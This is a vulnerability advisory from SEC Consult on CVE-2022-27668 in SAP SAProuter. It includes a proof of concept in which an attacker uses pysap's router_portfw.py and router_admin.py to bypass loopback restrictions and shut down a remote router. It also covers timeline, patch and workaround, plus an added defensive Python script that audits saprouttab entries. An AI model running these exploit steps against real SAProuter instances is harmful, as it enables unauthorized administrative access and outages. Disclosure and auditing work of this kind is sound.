SAP SAProuter Improper Access Control

SAP SAProuter Improper Access Control
Posted Sep 16, 2022
Authored by Fabian Hagg | Site sec-consult.com

SAP SAProuter suffers from an improper access control vulnerability where permitting loopback traffic can lead to unexpected behavior.

tags | exploit
advisories | CVE-2022-27668
SHA-256 | 91240243e7e61439bb89c02bbb4588f61e70077ca27fc537904e51613f2c8bd3

SEC Consult Vulnerability Lab Security Advisory < 20220914-0 >
title: Improper Access Control
product: SAP® SAProuter
vulnerable version: see section "Vulnerable / tested versions"
fixed version: see SAP security note 3158375
CVE number: CVE-2022-27668
impact: high
homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html
found: 2022-02-25
by: Fabian Hagg (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult, an Atos company
Europe | Asia | North America



Vendor description:
"SAProuter is a software application that provides a remote connection
between our customer's network and SAP. SAProuter can be used to:

- Improve network security, e.g. by using a password or by only allowing
encrypted connections from known sources
- Control and log the connections to your SAP system
- Set up an indirect connection when programs involved cannot
communicate with each other due to the network configuration
- Increase performance and stability by reducing the SAP system workload
within a local area network (LAN) when communicating with a wide area
network (WAN)" [1]

[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html

Business recommendation:
SEC Consult recommends implementing security note 3158375, in which the
documented issue is fixed according to the vendor. We advise installing the
correction as a matter of priority to keep business-critical data secured.

Vulnerability overview/description:
1) Improper Access Control (CVE-2022-27668)
According to SAP note 1853140: "in the default configuration, the
SAProuter does not allow a route to itself. You can explicitly permit
the 'loopback' from the SAProuter to itself using option -X".

It has been identified that under certain circumstances this restriction does
not hold and may lead to unexpected behavior. External attackers with network
access to a (weakly configured) SAProuter instance can exploit an improper
access control vulnerability by sending packets of type NI_ROUTE in order to
establish a tunnel that allows them to manage the SAProuter externally, even
when it was started without option -X.

This enables an attacker to send packets of type ROUTER_ADM in order to
gain unauthorized access to administrative functions such as stopping
the remote SAProuter instance, displaying connection information,
switching trace level, or terminating a specific connection.

Proof of concept:
1) Improper Access Control (CVE-2022-27668)
For successful exploitation of this vulnerability, the following prerequisites
must be met:

- Route permission table saprouttab must contain an entry that
explicitly permits external hosts to connect to port 3299 of
arbitrary hosts. Some examples of such entries are shown in
the following listing:

P <source-host incl. attacker-controlled machine> * 3299
P <source-host incl. attacker-controlled machine> * 3200.3300

- SAProuter is running (option -X does not need to be set) and the
attacker has network-wise access to its listening port.

The vulnerability can be verified by means of the publicly available
Python script router_portfw.py [2] of the open source pysap framework
developed by M. Gallo. The script, which is based on a scapy re-implementation
of the proprietary SAP Router protocol, allows for port forwarding through
a SAProuter service.

For demonstration purposes, the following simplified lab setup is used:

SAProuter (IPv4: <-----> Attacker (IPv4:
SAProuter started with option -r: | Pysap framework
./saprouter -r |
Content of saprouttab in workdir: |
P * 3299 |

The following listing shows that it is not possible to establish a
"loopback" tunnel through the remote SAProuter service by specifying a
target destination host (option -t) and target destination
port 3299 (option -r). As expected, this route is filtered and denied
by default even when explicitly allowed through the route permission

attacker@$ python router_portfw.py -d -p 3299
-t -r 3299 -a -l 3299 -v
[*] Setting a proxy between and remote SAP Router 192.168.
56.103:3299 (talk mode raw)
SAPNIProxy: Binded to address, proxying to
Routing to
To send 61 bytes data + 4 bytes NI header
Received 4 bytes NI header, to receive 211 bytes data
Received 211 bytes data
Route request to not accepted by

It was discovered that it is possible to circumvent this check using
the non-standard IPv4 broadcast address (see RFC5735, RFC1122).
When specifying destination host and destination port 3299,
this leads to an effective access control bypass as can be seen in the
following listing.

attacker@$ python router_portfw.py -d -p 3299
-t -r 3299 -a -l 3299 -v
[*] Setting a proxy between and remote SAP Router 192.168.
56.103:3299 (talk mode raw)
SAPNIProxy: Binded to address, proxying to
Routing to
To send 59 bytes data + 4 bytes NI header
Received 4 bytes NI header, to receive 8 bytes data
Received 8 bytes data
Route request to accepted by

attacker@$ ss -antlp | grep "3299"
LISTEN 0 5* users:(("python",pid=1985,fd=3))

Once the tunnel is established, an attacker can invoke administrative
functions via the local port 3299, which is forwarded to the loopback
interface of the remote SAProuter instance. For example, the Python
script router_admin.py [3] of the pysap framework can be used to
shut down (option -s) the running SAProuter instance on the remote host.

attacker@$ python router_admin.py -s -d -p 3299
[*] Requesting stop of the remote SAP Router
[*] Connected to the SAP Router
[*] Using SAP Router version 40
[*] Sending Router Admin packet

netwadm@$ ./saprouter -r

trcfile dev_rout
no logging active

WARNING: wildcard character used in route target

shutdown message received, good bye ...

External links:
[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py
[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py

Vulnerable / tested versions:
The following versions of the binary were found to be vulnerable during our tests:

- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)
- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)

No additional testing on other releases has been carried out. According to the vendor,
the following releases and versions are affected by the discovered vulnerability:

- KRNL64NUC 7.49
- KRNL64UC 7.49
- KERNEL 7.49
- KERNEL 7.77
- KERNEL 7.81
- KERNEL 7.85
- KERNEL 7.86
- KERNEL 7.87
- KERNEL 7.88

Vendor contact timeline:
2022-02-25: Contacting vendor through vulnerability submission web form.
2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.
2022-04-04: Requesting status update.
2022-04-05: Vendor confirms vulnerability and states that a fix is already
complete. The corresponding security note is expected to be
released with the upcoming April 2022 patch day.
2022-04-12: Patch day April 2022 passed without release.
2022-05-10: Patch day May 2022 passed without release.
2022-06-14: Vendor releases patch with SAP Security Note 3158375.
2022-06-14: Requesting confirmation that the finding was fixed by the
published security note as no prior notification was provided.
2022-06-28: Vendor confirms that the patch included in Security Note 3158375
fixes the issue. The vulnerability got assigned CVE-2022-27668.
2022-09-14: Release of this security advisory.

Solution:
The vendor provides a patched version which should be installed immediately.
The software can be obtained via the SAP service marketplace. Further
information can be found in the corresponding Security Note 3158375 [4].

[4] https://launchpad.support.sap.com/#/notes/3158375

Workaround:
Remove any wildcard (*) values in the target host or IP address directive
of route permission table saprouttab entries 'P' and 'S'. In general, it
is recommended not to use any wildcard values in the route permission
table saprouttab. Additional information on the secure configuration of
SAProuter can be found in SAP Security Note/KBA 1895350 [5].

[5] https://launchpad.support.sap.com/#/notes/1895350
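The prerequisite in the proof of concept and the workaround above both come down to the same question: does any permit entry in saprouttab leave the target host open to a wildcard, or cover target port 3299? The following audit script is an added example (not part of the advisory or of pysap) that parses a constructed saprouttab and flags exactly those entries. It assumes the port-range syntax shown in the advisory ("3200.3300"); accepting a hyphen as range separator is an additional assumption.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample saprouttab for illustration (not taken from the advisory).
SAMPLE_SAPROUTTAB = """\
# corporate clients to one dispatcher: specific target, specific port
P 10.0.0.* 10.1.1.5 3200 secret
# overly permissive: any source to any host on any port
P * * *
# the advisory's risky patterns: wildcard target with a range covering 3299
P 192.168.56.101 * 3200.3300
S 192.168.56.101 * 3299
D * * *
"""

SAPROUTER_PORT = 3299  # SAProuter's own listening port, reachable via the loopback route


@dataclass
class Finding:
    line_no: int
    entry: str
    reasons: List[str]


def port_matches(spec: str, port: int) -> bool:
    """True if a saprouttab port spec ('*', '3299', '3200.3300' or '3200-3300') covers port."""
    if spec == "*":
        return True
    m = re.fullmatch(r"(\d+)[.-](\d+)", spec)  # range; hyphen form is an assumption
    if m:
        lo, hi = int(m.group(1)), int(m.group(2))
        return lo <= port <= hi
    return spec.isdigit() and int(spec) == port  # service names never match here


def audit_saprouttab(text: str) -> List[Finding]:
    """Flag permit entries (P/S and their SNC variants) that the workaround says to remove."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # strip comments and blank lines
        fields = line.split()
        if len(fields) < 4:
            continue
        kind, _src, dst, port = fields[:4]  # a fifth field (password) may follow
        if kind.upper() not in ("P", "S", "KP", "KS"):  # D/KD entries deny, nothing to flag
            continue
        reasons = []
        if "*" in dst:
            reasons.append("wildcard in target host")
        if port_matches(port, SAPROUTER_PORT):
            reasons.append("target port spec covers 3299 (route back to a SAProuter)")
        if reasons:
            findings.append(Finding(n, line, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_saprouttab(SAMPLE_SAPROUTTAB):
        print(f"line {f.line_no}: {f.entry!r}: {'; '.join(f.reasons)}")
```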

Advisory URL:


SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendations about the risk profile of new technologies.

Interested in working with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF F. Hagg / @2022
